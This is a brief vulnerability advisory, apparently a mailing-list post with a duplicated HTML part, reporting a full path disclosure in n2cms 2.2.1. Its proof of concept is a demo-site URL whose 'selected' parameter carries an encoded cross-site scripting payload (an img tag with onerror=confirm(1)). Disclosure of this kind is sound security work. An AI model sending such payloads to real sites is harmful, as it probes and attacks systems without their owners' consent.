# Affected software: n2cms # Type of vulnerability:full path disclosure # URL:n2cms.com # Discovered by: provensec # Website: provensec.com #version: *2.2.1* # Proof of concept http://demo.n2cms.com/N2/Files/FileSystem/File.aspx?selected=%2fupload%2f%22%3E%3Cimg%20src=d%20onerror=confirm(1);%3E1.php%2f manipulating the selected paramter will splash error which discloses system path --047d7bd6bb5a40b6a5051578e115 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable

# Affected software: n2cms

# Type of vulnerabilit= y:full path disclosure

# URL:n2cm= s.com

# Discovered by: provensec

# Website: <= a href=3D"http://provensec.com">provensec.com

<= /div>

#version:=A02.2.1=A0<= /span>

# Proof of concept

<= span style=3D"font-family:'comic sans ms',sans-serif">

= http://demo.n2cms.com/N2/Files/FileSystem/File.aspx?selected=3D%2fupload%2f= %22%3E%3Cimg%20src=3Dd%20onerror=3Dconfirm(1);%3E1.php%2f

manipulating the selected paramter will splash error wh= ich discloses system path=A0

=A0